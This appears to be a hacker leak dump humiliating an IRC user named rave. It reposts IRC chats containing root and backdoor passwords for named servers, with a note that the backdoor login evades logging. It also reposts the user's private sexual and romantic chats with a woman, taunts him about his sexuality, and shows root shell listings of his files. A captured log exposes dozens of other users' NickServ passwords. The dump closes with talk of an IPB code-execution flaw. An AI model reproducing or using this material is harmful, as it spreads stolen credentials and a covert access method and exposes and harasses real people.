Sep 04 11:13:06 angelo or even hack the system by ftpd
Sep 04 11:13:12 angelo are u following me?
Sep 04 11:13:20 rave yes i get what you mean
Sep 04 11:13:42 angelo now...

LET ME GUESS. HE WILL READ THE LOGS AND LAUGH AT HOW DUMB YOU ARE.

-~-~-~

PASSWORDS IN PLAIN TEXT. FUCKING BRILLIANT.

Sep 18 00:39:33 rave can you check if ssh www.rosiello.net works now ?
Sep 18 00:39:43 angelo ok
Sep 18 00:39:47 rave i dont know if they are fake
Sep 18 00:39:55 rave they just dont work on my box
Sep 18 00:40:20 angelo it works
Sep 18 00:40:25 angelo ssh
Sep 18 00:40:48 rave rave:godiswithus
Sep 18 00:41:05 rave dont steal my porn
Sep 18 00:41:21 rave and dont packet filter my cyber sex adventures !!
Sep 18 00:41:30 angelo I will add my self
Sep 18 00:41:50 rave you cant you have no root
Sep 18 00:42:00 rave you can only do it after you hacked it
Sep 18 00:42:01 angelo oh
Sep 18 00:42:14 angelo can't u add an user angelo?
Sep 18 00:42:15 angelo add angelo
Sep 18 00:42:19 angelo pass test123
Sep 18 00:42:21 angelo I will change the pwd
Sep 18 00:42:28 rave ok hold on
Sep 18 00:44:39 rave done ...


Sep 20 22:55:54 baaah ssh tech.tnet.no -l root
Sep 20 22:56:05 rave well i dont want to spoil you fun
Sep 20 22:56:09 rave passwd ??
Sep 20 22:56:18 baaah backdoor password: vulnerable (WHATEVER YOU DO! DONT GIVE HIM THIS PASWORD!!! OR TELL HIM ABOUT IT)
Sep 20 22:56:34 baaah real password: cerwinvegav10f
Sep 20 22:56:37 baaah use the backdoor password
Sep 20 22:56:41 baaah because then you dont get logged
Sep 20 22:56:47 baaah and histfile is /dev/null
Sep 20 22:56:48 baaah etc.
Sep 20 22:56:57 baaah it wont appear in syslog either

-~-~-~

H0NO IS ON THE SAME LEVEL AS RAVE.

Sep 20 23:09:19 rave ppl with my knollage (sorry to drag i didnt mean to) can just walk in to boxes

-~-~-~

AS THE SERVER TURNS...

Sep 12 02:42:34 rave she knows the art
Sep 12 02:42:41 rave the art as in
Sep 12 02:42:50 rave not to gigle like a 16 year old girl
Sep 12 02:42:59 rave but stay serieuse
Sep 12 02:43:14 rave and expose litle parsts about her self
Sep 12 02:43:24 rave and those are horney and she knows it
Sep 12 02:43:35 rave thats why she lifts up her skirt
Sep 12 02:43:50 rave by exident she claims
Sep 12 02:44:08 qeed ah
Sep 12 02:44:11 qeed nympho ;P
Sep 12 02:44:17 qeed man im just labeling girls as sex toys today
Sep 12 02:44:18 qeed how rude
Sep 12 02:44:51 rave neeh she is realy sweet as well
Sep 12 02:45:01 rave like as in realy sweet
Sep 12 02:45:12 rave but she just know the game of saduction
Sep 12 02:46:43 rave i think with these kind of girls
Sep 12 02:46:56 rave you could stick even ur hear in her puss
Sep 12 02:47:10 qeed nice girl you fetched down by the river
Sep 12 02:47:20 rave and drown ur self !!
Sep 12 02:47:24 rave lol
Sep 12 02:47:27 qeed +D
Sep 12 02:49:04 rave and so sweet
Sep 12 02:49:37 rave and your sutch with the young girls who are even afraid to be fingered
Sep 12 02:49:47 rave mine sayes isthat all ?
Sep 12 02:49:55 rave fuck me now bastart
Sep 12 02:50:02 rave make me kun !! har har !!
...
Sep 15 16:36:36 styx ok heres my mobile number :D *********** ;)
Sep 15 16:36:42 rave oooh
Sep 15 16:36:53 styx not that we should phone eachother cause we have skype :D
Sep 15 16:37:04 styx but we could send a few pics i guess :P
Sep 15 16:37:05 rave +07 is UK ?
Sep 15 16:37:14 rave sure
Sep 15 16:37:16 styx hmm +44 i think
Sep 15 16:37:20 styx lemme google
Sep 15 16:37:24 rave ok
Sep 15 16:39:11 styx yeah its +44
Sep 15 16:39:18 styx where do u live?
Sep 15 16:39:54 rave i live close to den helder
Sep 15 16:40:10 rave http://www.wieringen.nl/
Sep 15 16:40:50 rave +31 is my country number
Sep 15 16:40:58 rave let me give you my number
Sep 15 16:41:40 rave *********
Sep 15 16:41:50 rave complete that is
Sep 15 16:41:57 rave +31*********
...
Sep 17 22:18:48 rave i need a massage
Sep 17 22:19:07 styx i'll give u massage :D
Sep 17 22:19:23 rave mmmm i would like that sexy lady
Sep 17 22:19:37 rave my lower back hurts of a the development
Sep 17 22:22:49 * rave kisses styx in her neck
Sep 17 22:27:13 styx i shouldnt have done that
...
Sep 17 22:52:50 rave Rootx is all over you
Sep 17 22:53:05 styx lol
Sep 17 22:53:12 styx that cause i said i was f
Sep 17 22:53:12 rave :|
Sep 17 22:53:14 styx lol
Sep 17 22:53:17 styx dont worry
Sep 17 22:53:26 styx u got me, u got me good ;)
Sep 17 22:53:39 rave good else i would be a but jelouse
Sep 17 22:54:23 styx no need :D
Sep 17 22:54:46 styx im cold, brb gonna put a jumper on
Sep 17 22:54:56 rave awwww okey :)
Sep 17 22:55:20 rave yes good idea im cold a well !!. brrr warm me up a bit
Sep 17 22:57:27 styx ans so it is, just like u said it would be, we'll both forget the breeze, most of the time
Sep 17 22:57:54 styx and so it is, the colder water, the blowers daughter, the pupil ended it all
Sep 17 22:58:04 styx i cant take my eyes off of u
Sep 17 22:58:07 styx i cant take my eyes off of u
Sep 17 22:58:09 styx i cant take my eyes off of u
Sep 17 22:58:19 styx and so it is
Sep 17 22:58:34 styx oooooooooooo
Sep 17 22:58:42 styx did i say i that i love u
Sep 17 22:58:49 styx did i say that i want to
Sep 17 22:58:54 styx leave it all behind?
Sep 17 22:59:08 styx i cant take my mind off of u
Sep 17 22:59:12 styx i cant take my mind off of u
Sep 17 22:59:35 styx :D
Sep 17 22:59:38 styx sorry
Sep 17 22:59:40 styx lol
Sep 17 22:59:50 rave these my lines for you
Sep 17 22:59:55 rave *there where ...
Sep 17 23:00:16 styx :|
Sep 17 23:00:23 rave I cant keep my off of you and girl you know that im true ...
Sep 17 23:01:15 rave you have verry twinklying eyes
Sep 17 23:01:57 styx rave u are something special, u know that? :D
Sep 17 23:02:05 rave i am ?
Sep 17 23:02:12 styx very
Sep 17 23:02:16 rave what makes me so special ?
Sep 17 23:02:17 styx im serious
Sep 17 23:02:23 styx just u
Sep 17 23:02:27 styx nothing else
Sep 17 23:02:33 styx thats the best thing
Sep 17 23:02:37 rave :O :*
Sep 17 23:02:45 styx u are :D
Sep 17 23:02:52 styx thats cool
Sep 17 23:02:56 rave thats realy sweet
Sep 17 23:03:02 styx do me a favour
Sep 17 23:03:06 rave no one ever told me i was special
Sep 17 23:03:35 styx if we dont work out, and things dont happen (i hope they do) stay exactly as u are
Sep 17 23:03:50 styx u shouldnt change for anyone
Sep 17 23:03:52 styx :)
Sep 17 23:04:15 rave awww girl thats so sweet it even brought a tear to my eye
Sep 17 23:04:24 rave come here you sexy !
Sep 17 23:04:35 styx awww lol
Sep 17 23:04:44 styx i meant it :)
Sep 17 23:04:56 rave yes aww thank you so much
Sep 17 23:05:04 rave ty ty ty Kisssssssssssssssssssssssss
Sep 17 23:05:23 styx u dont need to thank me, just carry on being u thats all i want :D
Sep 17 23:05:27 styx :*
Sep 17 23:05:38 rave the same for you, In atleast that you tryed to make it work
Sep 17 23:05:52 rave since your age is mutch higher then mine
Sep 17 23:06:02 styx age doesnt matter
Sep 17 23:06:16 styx im only 8 yrs older
Sep 17 23:06:20 rave some like to think so
Sep 17 23:06:21 styx i think lol
Sep 17 23:06:35 styx but
Sep 17 23:07:07 styx u said 'i tryed to make it work', does that mean thats it?
Sep 17 23:07:30 rave nooooooooooo
Sep 17 23:07:53 rave with you letting me in we could not ever start to make it work
Sep 17 23:08:01 rave and now i dont want to let yo go
Sep 17 23:08:14 styx let me go?
Sep 17 23:08:18 rave yeah
Sep 17 23:08:21 styx why
Sep 17 23:08:36 rave dont go thats what i sayed :D
Sep 17 23:08:53 styx oh
Sep 17 23:08:56 rave because i got the hots for you :D i want you around me all the time
Sep 17 23:09:04 styx thats cool
Sep 17 23:09:06 styx :D
Sep 17 23:09:36 styx wanna skype?
Sep 17 23:09:37 rave your super sweet to me, and you give me this special feeling like i never realy felt like
Sep 17 23:09:52 styx u too rave
Sep 17 23:10:01 rave no not yet im still warming up :D
Sep 17 23:10:14 rave i wanna say sweet things to you
Sep 17 23:10:47 styx :)
Sep 17 23:11:17 * rave closes his eyes and daydreams about you
Sep 17 23:11:24 rave you are here with me
Sep 17 23:11:28 styx ok my music is gonna be turned up for a while then :)
Sep 17 23:11:31 rave right next to me
Sep 17 23:11:42 styx i wish i was :(
Sep 17 23:11:56 rave and we are all alone and your just sitting there
Sep 17 23:12:09 rave looking @ me with these eyes turned to love mode
Sep 17 23:12:19 rave and im basicly do the same
Sep 17 23:12:25 styx rave
Sep 17 23:12:31 styx dont do that lol
Sep 17 23:12:57 rave i cant help day dreaming about you
Sep 17 23:14:34 rave :)
...
Sep 18 00:49:00 styx can u come over? like in the next 30mins?
Sep 18 00:49:03 styx :D
Sep 18 00:49:21 rave then what ? even my car isnt that fast lol
Sep 18 00:49:36 rave you have plans for a romantic night together ?
Sep 18 00:49:41 styx i just want u here to hug thats all
Sep 18 00:49:51 styx nothing more, or less
Sep 18 00:50:05 styx i just wanna snuggle up to u
Sep 18 00:50:06 rave i want the same sooo badly
Sep 18 00:50:17 rave yeah i want to hold you girl
Sep 18 00:50:29 rave and tell you what i feel for you
Sep 18 00:50:48 styx i want that too
Sep 18 00:51:25 rave yeah
Sep 18 00:51:35 rave infact its my only dream right now
Sep 18 00:51:46 rave just to touch you
Sep 18 00:51:54 rave and see if im not dreaming
Sep 18 00:52:02 rave if this is for real
Sep 18 00:52:10 rave and then grep you and hug you
Sep 18 00:53:14 styx i need to wrap up warm rave
Sep 18 00:53:33 rave well then come in my arms girl
Sep 18 00:53:54 rave mmm i would almost kill for that momend
Sep 18 00:54:21 styx rave i would love to come into your arms right now
Sep 18 00:54:37 styx to be so warm and snug
Sep 18 00:55:02 rave ow yes
Sep 18 00:55:15 rave i would have a big smile on my face
Sep 18 00:55:23 styx me too
Sep 18 00:55:24 rave like as big as mine is now
Sep 18 00:55:33 rave just because i would feel soo happy
Sep 18 00:56:20 rave your a thief ..... you stole my litle heart
Sep 18 00:57:07 styx im sooooooo tired tho :(
Sep 18 00:57:18 styx i wanna snuggle dammit
Sep 18 00:57:31 rave yeah :(
...
Sep 24 23:21:23 rave Styx i want to say im sorry
Sep 24 23:45:00 styx what for?
Sep 24 23:45:37 rave for what i sayed in #rosiello
Sep 24 23:47:09 styx yeah well i have never been looked on as a slut before, but i reckon seeing that before i went to work made me feel bad
Sep 24 23:47:35 rave you are no slut
Sep 24 23:47:55 styx i felt like it infront of #rosiello
Sep 24 23:47:56 rave your the best girl in this world and im the ass hole
Sep 24 23:48:09 rave they dont know who that girl is
Sep 24 23:48:21 styx yeah they did
Sep 24 23:48:32 styx but still
Sep 24 23:48:48 rave i feel realy bad
Sep 24 23:49:09 styx i love u in all the world
Sep 24 23:49:15 rave realy realy bad
Sep 24 23:49:23 rave and like i sayed
Sep 24 23:49:39 rave i got scared when i did read it
Sep 24 23:50:02 rave i didnt even knew i sayed it
Sep 24 23:50:11 styx i got upset at like 4 in the morning
Sep 24 23:50:19 styx i dunno
Sep 24 23:50:27 rave own god :(
Sep 24 23:50:41 styx its like i dunno
Sep 24 23:50:52 styx the whole chan knew
Sep 24 23:51:11 styx and sex isnt the only thing
Sep 24 23:51:16 styx i told u that
Sep 24 23:51:27 styx i thought u felt the same
Sep 24 23:51:28 rave and i told you the same
Sep 24 23:51:52 rave do you see me as a sex maniac ?
Sep 24 23:52:15 styx i see u as someone that will openly tell ppl im wet :/
...
Sep 25 16:30:20 rave i kiss only you my love
Sep 25 16:30:27 styx :P
Sep 25 16:30:52 rave bye bye
Sep 25 16:30:56 styx bye :D
Sep 25 16:55:20 styx i miss you :(
Sep 25 16:57:02 rave hi princess
Sep 25 16:57:08 styx :D
Sep 25 16:57:10 styx wb :P
Sep 25 16:57:36 rave :D
Sep 25 16:57:41 rave i mised you to
Sep 25 16:57:49 styx how was your shower?
Sep 25 16:57:52 rave when i realaliced i wass kissing air
Sep 25 16:57:57 styx lol
Sep 25 16:57:58 rave fine fine
Sep 25 16:58:56 styx so what do u have planned for today?
Sep 25 16:59:12 rave nothing but my n1 prio was seeing you :)
Sep 25 16:59:20 styx aww :)
Sep 25 16:59:28 rave yeah
Sep 25 16:59:42 styx well i dont have to be at work early tomorrow, so i can stay up late :D
Sep 25 16:59:50 rave same here
Sep 25 17:00:14 styx i have an 8am start instead of 5am, much more reasonable :P
Sep 25 17:00:36 rave i have to start @ 8 as well :)
Sep 25 17:00:41 styx :)
Sep 25 17:01:11 rave i wish you where with me in the shower
Sep 25 17:01:28 styx yeah me too, would have been nice
Sep 25 17:01:56 rave verry nice yes :D i have tought about t 2 in the shower
Sep 25 17:02:04 rave didnt leave me cold
Sep 25 17:02:10 styx :)
Sep 25 17:02:26 rave :D ur still looking @ me ?
Sep 25 17:02:32 styx yeah :D
Sep 25 17:02:36 styx i like what i see too
Sep 25 17:02:38 styx :P
Sep 25 17:02:41 rave awwww
Sep 25 17:02:57 rave your so sweet to me
Sep 25 17:03:15 styx and you to me :P
Sep 25 17:03:47 rave im your man my love :) your deticated man for beter or wurse
Sep 25 17:03:55 styx :D
Sep 25 17:04:04 rave :*
Sep 25 17:04:08 styx :*
Sep 25 17:04:44 styx awww :D
Sep 25 17:06:33 rave im daydreaming
Sep 25 17:06:48 styx :D
Sep 25 17:06:52 styx what about?
Sep 25 17:07:07 rave who else or what else then you princess
Sep 25 17:07:13 styx :P
Sep 25 17:09:06 rave im dreaming about dancing with you slowly on a love song, holding you verry close to me
Sep 25 17:09:18 rave and i look in your eyes and we start to kiss
Sep 25 17:09:34 styx aww i have a very warm feeling :)
Sep 25 17:09:52 rave hehe me 2 aldo its freezing here
Sep 25 17:10:19 rave dream with me this dream i can have it all day. I can hear the music already
Sep 25 17:10:51 styx :)
Sep 25 17:11:19 rave :D wow and we are all alone because we forgot the rest of the world
Sep 25 17:12:08 styx i forget the rest of the world everytime i think of you
Sep 25 17:12:38 rave aww girl that brought a tear to my eye
Sep 25 17:12:53 styx :)
Sep 25 17:13:09 rave :D :*
Sep 25 17:13:13 styx :*
Sep 25 17:13:31 rave im in love with a princess and an angel in the same time
Sep 25 17:13:39 styx awww :)
Sep 25 17:14:02 styx and im in love with such a kind, loving, goodlooking man :D
Sep 25 17:14:33 rave i love it when you say "im in love"
Sep 25 17:14:39 rave makes me feel all warm in side
Sep 25 17:14:47 styx :D
Sep 25 17:14:59 styx good cause the love i have for u makes me warm also
Sep 25 17:15:25 rave im in love sooooooo mutch
Sep 25 17:15:56 styx :D
Sep 25 17:16:22 rave i wonder how strong my network would be in my bed
...
...GET READY...
...
Sep 08 23:27:31 rave ur staight ?
Sep 08 23:27:44 styx straight?
Sep 08 23:27:50 rave yeah
Sep 08 23:27:55 styx er yeah lol
Sep 08 23:28:05 rave im still wondering about you
Sep 08 23:28:13 styx why :/
Sep 08 23:28:18 rave i tought maybe if ur lesbian
Sep 08 23:28:27 rave your the male type of both
Sep 08 23:28:29 styx rofl nah your ok
Sep 08 23:28:34 rave that would explain a lot
Sep 08 23:28:40 styx im straight
Sep 08 23:28:41 styx :P
Sep 08 23:28:58 rave im not
Sep 08 23:29:06 styx thats cool
Sep 08 23:29:08 styx :)
Sep 08 23:29:18 rave im bi sexual
...
BUHAHHAHAHAHAHAHHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHHAHAHAHAHAHAHAHAA!@#!%$!@!!

-~-~-~

THIS LOG IS ALL FAKED. RAVE HAVE NEVER BEEN OWNED! N3V3R B33N 0WN3D!!

th3z3 r0s13ll0 fuqz c0d3 m0r3 p0c th4n c0ntex 4ft3r p4tch tu3zd4y. l4m3rz.

N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! B1S3XU4L! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! T4K3Z 1T UP TH3 4ZZ! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! DUMP3D BY H1Z 30+ YR 0LD 0NL1N3 GF! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! C0DEZ A FTPD M0R3 1NS3CUR3 TH4N PUREFPTD! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!!


root@alpha:~# ls -al /home
total 48
drwxrwsr-x 12 root staff 4096 Dec 11 19:39 .
drwxr-xr-x 24 root root 4096 Oct 24 15:56 ..
drwxr-s--x 25 amanda users 4096 Apr 12 00:20 amanda
drwxrwsr-x 7 anope users 4096 Apr 16 11:42 anope
drwxr-sr-x 6 cold users 4096 Apr 16 02:32 cold
drwxr-sr-x 3 root staff 4096 Nov 19 15:23 cvsweb
drwxr-sr-x 2 root staff 4096 Nov 19 15:57 dylan
drwxr-sr-x 3 extreme users 4096 Sep 5 2005 extreme
drwxr-sr-x 2 root nogroup 4096 Aug 29 2005 ftp
drwxr-sr-x 4 infobot users 4096 Feb 7 17:07 infobot
drwxr-sr-x 2 root staff 4096 Aug 20 2005 jmoschetti45
drwxrwxrwx 10 rave rave 4096 Mar 11 15:15 rave
root@alpha:~# ls -al /home/rave
total 460
drwxrwxrwx 10 rave rave 4096 Mar 11 15:15 .
drwxrwsr-x 12 root staff 4096 Dec 11 19:39 ..
-rw------- 1 rave rave 90 Mar 11 12:09 .bash_history
-rw-r--r-- 1 rave rave 567 Aug 19 2005 .bash_profile
-rw-r--r-- 1 rave rave 1834 Aug 19 2005 .bashrc
drwxr-xr-x 2 root root 4096 Nov 20 20:53 CVS
drwxr-xr-x 7 root root 4096 Aug 21 2005 cvsroot
-rw-rw-rw- 1 rave rave 0 Oct 7 2005 ftpT9vlAu
drwxr-xr-x 3 root root 4096 Aug 21 2005 home
-rwxr-xr-x 1 root root 318 Aug 22 2005 ip
drwxr-xr-x 8 root root 4096 Mar 11 15:17 jatx
-rw-r--r-- 1 root root 409600 Nov 20 20:57 jatx-0.1.tar
drwxr-xr-x 2 root root 4096 Mar 11 12:56 project
drwxr-xr-x 8 root root 4096 Dec 13 18:16 rave@192.168.0.10
drwxr-xr-x 9 www-data www-data 4096 Mar 11 15:19 svn
drwxr-xr-x 2 root root 4096 Mar 11 12:56 trunk
root@alpha:~# ls -al /home/rave/cvsroot/anIRCD
total 400
drwxr-xr-x 4 root root 4096 Aug 21 2005 .
drwxr-xr-x 7 root root 4096 Aug 21 2005 ..
-r--r--r-- 1 root root 406 Aug 21 2005 AUTHORS,v
-r--r--r-- 1 root root 18382 Aug 21 2005 COPYING,v
-r--r--r-- 1 root root 373 Aug 21 2005 ChangeLog,v
-r--r--r-- 1 root root 10541 Aug 21 2005 Doxyfile,v
-r--r--r-- 1 root root 7343 Aug 21 2005 INSTALL,v
-r--r--r-- 1 root root 519 Aug 21 2005 Makefile.am,v
-r--r--r-- 1 root root 434 Aug 21 2005 Makefile.cvs,v
-r--r--r-- 1 root root 373 Aug 21 2005 NEWS,v
-r--r--r-- 1 root root 373 Aug 21 2005 README,v
-r--r--r-- 1 root root 373 Aug 21 2005 TODO,v
-r--r--r-- 1 root root 6805 Aug 21 2005 anircd.kdevelop,v
-r--r--r-- 1 root root 1039 Aug 21 2005 anircd.kdevelop.pcs,v
-r--r--r-- 1 root root 1033 Aug 21 2005 anircd.kdevses,v
-r-xr-xr-x 1 root root 40306 Aug 21 2005 config.guess,v
-r-xr-xr-x 1 root root 30003 Aug 21 2005 config.sub,v
-r--r--r-- 1 root root 525 Aug 21 2005 configure.in,v
-r-xr-xr-x 1 root root 13325 Aug 21 2005 depcomp,v
-r-xr-xr-x 1 root root 6694 Aug 21 2005 install-sh,v
-r--r--r-- 1 root root 182738 Aug 21 2005 ltmain.sh,v
-r-xr-xr-x 1 root root 10651 Aug 21 2005 missing,v
-r-xr-xr-x 1 root root 2364 Aug 21 2005 mkinstalldirs,v
drwxr-xr-x 3 root root 4096 Aug 21 2005 src
drwxr-xr-x 2 root root 4096 Aug 21 2005 templates
root@alpha:~# ls -al /home/rave/home/rave
total 744
drwxr-xr-x 25 root root 4096 Aug 21 2005 .
drwxr-xr-x 3 root root 4096 Aug 21 2005 ..
lrwxrwxrwx 1 root root 45 Aug 21 2005 .DCOPserver_debian.rosiello.net_:0 -> /home/rave/.DCOPserver_debian.rosiello.net__0
-rw-r--r-- 1 root root 66 Aug 21 2005 .DCOPserver_debian.rosiello.net__0
-rw------- 1 root root 1174 Aug 21 2005 .ICEauthority
-rw------- 1 root root 191 Aug 21 2005 .Xauthority
-rw------- 1 root root 5758 Aug 21 2005 .bash_history
-rw-r--r-- 1 root root 704 Aug 21 2005 .bash_profile
-rw-r--r-- 1 root root 1290 Aug 21 2005 .bashrc
-rw------- 1 root root 22 Aug 21 2005 .dmrc
drwxr-xr-x 3 root root 4096 Aug 21 2005 .evolution
-rw-r--r-- 1 root root 563794 Aug 21 2005 .fonts.cache-1
drwx------ 4 root root 4096 Aug 21 2005 .gaim
drwx------ 4 root root 4096 Aug 21 2005 .gconf
drwx------ 2 root root 4096 Aug 21 2005 .gconfd
-rw-r----- 1 root root 0 Aug 21 2005 .gksu.lock
drwx------ 3 root root 4096 Aug 21 2005 .gnome
drwx------ 9 root root 4096 Aug 21 2005 .gnome2
drwx------ 2 root root 4096 Aug 21 2005 .gnome2_private
drwxr-xr-x 3 root root 4096 Aug 21 2005 .gnupg
drwxr-xr-x 2 root root 4096 Aug 21 2005 .gstreamer-0.8
-rw-r--r-- 1 root root 86 Aug 21 2005 .gtkrc-1.2-gnome2
drwx------ 4 root root 4096 Aug 21 2005 .kde
drwxr-xr-x 3 root root 4096 Aug 21 2005 .mcop
-rw------- 1 root root 31 Aug 21 2005 .mcoprc
drwx------ 3 root root 4096 Aug 21 2005 .metacity
drwx------ 3 root root 4096 Aug 21 2005 .mozilla
-rw------- 1 root root 7 Aug 21 2005 .nano_history
drwxr-xr-x 3 root root 4096 Aug 21 2005 .nautilus
drwxr-xr-x 2 root root 4096 Aug 21 2005 .qt
-rw------- 1 root root 0 Aug 21 2005 .recently-used
drwx------ 2 root root 4096 Aug 21 2005 .ssh
drwx------ 3 root root 4096 Aug 21 2005 .xchat2
drwxr-xr-x 4 root root 4096 Aug 21 2005 .xmms
-rw-r--r-- 1 root root 2053 Aug 21 2005 .xsession-errors
-rw-r--r-- 1 root root 7920 Aug 21 2005 1077606958.gif
drwxr-xr-x 3 root root 4096 Aug 21 2005 Desktop
drwx------ 7 root root 4096 Aug 21 2005 Mail
drwxr-xr-x 2 root root 4096 Aug 21 2005 bin
drwxr-xr-x 7 root root 4096 Aug 21 2005 cvsroot
-rwxr-xr-x 1 root root 13 Aug 21 2005 echo
drwxr-xr-x 8 root root 4096 Sep 8 2005 extreme
-rw-r--r-- 1 root root 74 Aug 21 2005 gpg-agent-info
-rw------- 1 root root 13449 Aug 21 2005 mbox
-rw-r--r-- 1 root root 96 Aug 21 2005 text.gpg
-rwxr-xr-x 1 root root 32 Aug 21 2005 vuln.sh
root@alpha:~# ls -al /home/rave/home/rave/.gaim:
total 64
drwx------ 4 root root 4096 Aug 21 2005 .
drwxr-xr-x 25 root root 4096 Aug 21 2005 ..
-rw-r--r-- 1 root root 4085 Aug 21 2005 accels
-rw------- 1 root root 556 Aug 21 2005 accounts.xml
-rw------- 1 root root 27509 Aug 21 2005 blist.xml
drwx------ 2 root root 4096 Aug 21 2005 icons
-rw------- 1 root root 10370 Aug 21 2005 prefs.xml
drwx------ 2 root root 4096 Aug 21 2005 smileys
root@alpha:~# cat /home/cold/.ssh/known_hosts
vortex.labs.pulltheplug.org,69.55.233.82 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4xKkjMPQ0oMFFyPNrrQf/AhankBHrBcrww2YL9YfDXMpUGafiGvs0yqVCWhLWAT2QcY4Olya3K9ykPDfRJ8PxI1YYikGuSkRjFF/yElP+HAXnMPKEkrtk46wTMMDE7s5yxquFAsHzhER7wActYnhWNAmjAPtbtKxzLRdcvDW17k=
root@alpha:~# cat /home/rave/home/rave/.ssh/known_hosts
192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoye+bhVXvF43qGdeFdPMZ2S7tEI+K258IkvqBPNOCUVkRxtpgbW015VQnVmUYSTOWr5tCkWJtNq34Jm9xgm0XJalBQfKpbkbvuvE6z88xDdveaDP6ELndsqCk7RsBTXmQemnuvzmfp881yGEQR8hcyK0eKccd0vYJAmx5uJpuxc=
war.swehack.se,213.80.38.17 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0c4J26RarVFEXwqio2Fvs3smJgMgWgTdXzoNVwhuB4bU6ebdI/54VGYPObuq5cBT/PFmj1Scf7Vtc7isGKtMHX+4Eo+jrwxJJ6RkGaWcAZd2h9IUOit8uPDT1oC3j65MZZZnj4dAnJDABBogNde/i6pJcStLbWoJ4Dnohy2ZEXE=
root@alpha:~# cat /irc.logger.HAHHA\@y0u\ guyz
Ignite -> NICKSERV : IDENTIFY verbatim
namElEz -> NICKSERV : IDENTIFY fobia37
rs -> nickserv : identify mindnet
jmos45 -> NICKSERV : IDENTIFY athena0814
rs -> nickserv : identify mindnet
rs -> nickserv : identify mindnet
rs -> rs : l0giz-g00d
rs -> rs : l0giz-g00d
IdleRPG -> NickServ : identify athena0814
IdleRPG -> ChanServ : op #idlerpg IdleRPG
uranther -> nickserv : identify av8idas
petroleum -> NickServ : identify iamanalien
plex0r -> NICKSERV : IDENTIFY wtfmates
morning_wood -> nickserv : identify qazwsx
rs -> nickserv : identify mindnet
namElEz -> NICKSERV : IDENTIFY fobia37
jmos45 -> NICKSERV : IDENTIFY athena0814
IdleRPG -> NickServ : identify athena0814
IdleRPG -> ChanServ : op #idlerpg IdleRPG
rs -> nickserv : identify mindnet
RAZ3R -> nickserv : identify red1988
Dr4g -> NICKSERV : IDENTIFY 1237896540
htek -> nickserv : identify ketrone
Joe -> NICKSERV : IDENTIFY athena0814
Joe -> NICKSERV : IDENTIFY athena0814
Dr4g -> NICKSERV : IDENTIFY 1237896540
Ignite -> NICKSERV : IDENTIFY verbatim
rave -> NICKSERV : IDENTIFY blabla
rave -> nickserv : help
htek -> nickserv : identify ketrone
Proxy -> NICKSERV : IDENTIFY 041187jamie
Animal -> nickserv : identify iamtheking
rs -> nickserv : identify mindnet
rs -> rs : test
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
Dr4g -> NICKSERV : IDENTIFY 1237896540
Seadog -> NICKSERV : IDENTIFY devcplusplus
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
Seadog -> NICKSERV : IDENTIFY devcplusplus
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
rs -> nickserv : identify mindnet
Seadog -> NICKSERV : IDENTIFY devcplusplus
goldnlink -> nickserv : identify Qbk2BnYN
rave -> NICKSERV : IDENTIFY blabla
Ignite -> NICKSERV : IDENTIFY verbatim
Seadog -> NICKSERV : IDENTIFY devcplusplus
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
dlab -> nickserv : help
dlab -> nickserv : identify IDontTrustYou
Dr4g -> chanserv : sop #dhell add petroleum
Dr4g -> chanserv : sop #dhell add rave
petroleum -> NickServ : identify iamanalien
Megahertz -> NICKSERV : IDENTIFY dhellsucks
Dr4g -> NICKSERV : IDENTIFY 1237896540
Ignite -> NICKSERV : IDENTIFY verbatim
RAZ3R -> nickserv : identify red1988
Megahertz -> NICKSERV : IDENTIFY dhellsucks
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
Dr4g_ -> NICKSERV : IDENTIFY 1237896540
caffeine24 -> NickServ : identify 041482ch
Megahertz -> NICKSERV : IDENTIFY dhellsucks
rs -> nickserv : identify mindnet
tgo -> IceShaman : why
IceShaman -> tgo : there's a 0day for IPB, code execdution, and I'm trying to find it
IceShaman -> tgo : I'm trying every trick in the book
IceShaman -> tgo : and I can only find small issues
tgo -> IceShaman : hmm
tgo -> IceShaman : not that template thing right?
tgo -> IceShaman : that was fake
IceShaman -> tgo : what template thing?
IceShaman -> tgo : no this is real
IceShaman -> tgo : someone used it on CS.net
CcSsNET -> CcSsNET : LC 1145380800.97560
IceShaman -> tgo : oh the template thing
IceShaman -> tgo : OutThere made
IceShaman -> tgo : nah, I knew what that was
IceShaman -> tgo : this is real
IceShaman -> tgo : I've found 2 issues
IceShaman -> tgo : one
IceShaman -> tgo : [sql]VAR_NAME[/sql]
IceShaman -> tgo : allows you to read variables
IceShaman -> tgo : due to the e modifier being in a preg_replace
IceShaman -> tgo : [sql]txt[/sql]
IceShaman -> tgo : gives you back your post with formatting
IceShaman -> tgo : only works when you edit the post
CcSsNET -> CcSsNET : LC 1145380860.36818
IceShaman -> tgo : but you cant call functions or use $var->any->of->this
IceShaman -> tgo : the second is you can change the path of a file being included
IceShaman -> tgo : but it's in a script only accessible to admins
tgo -> IceShaman : so the string gets passed ot eval or what?
IceShaman -> tgo : and you'd need register globals on
IceShaman -> tgo : tgo, no
IceShaman -> tgo : preg_replace(//e
CcSsNET -> CcSsNET : LC 1145380920.53562
IceShaman -> tgo : the e modifier makes the replacement get parsed as PHP
IceShaman -> tgo : so if you use \\2
IceShaman -> tgo : for a backreference
IceShaman -> tgo : the backreference gets parsed
IceShaman -> tgo : but it only allows vars
IceShaman -> tgo : if it had a $var in the replacement
IceShaman -> tgo : you had access to
IceShaman -> tgo : you'd be in business
IceShaman -> tgo : or if \\2 wasnt already in a function
IceShaman -> tgo : but this sploit is in IPB
CcSsNET -> CcSsNET : LC 1145380980.72563
IceShaman -> tgo : it allows remote code execution
IceShaman -> tgo : and I can't fucking find it
IceShaman -> tgo : it at least allows you to read/write to files
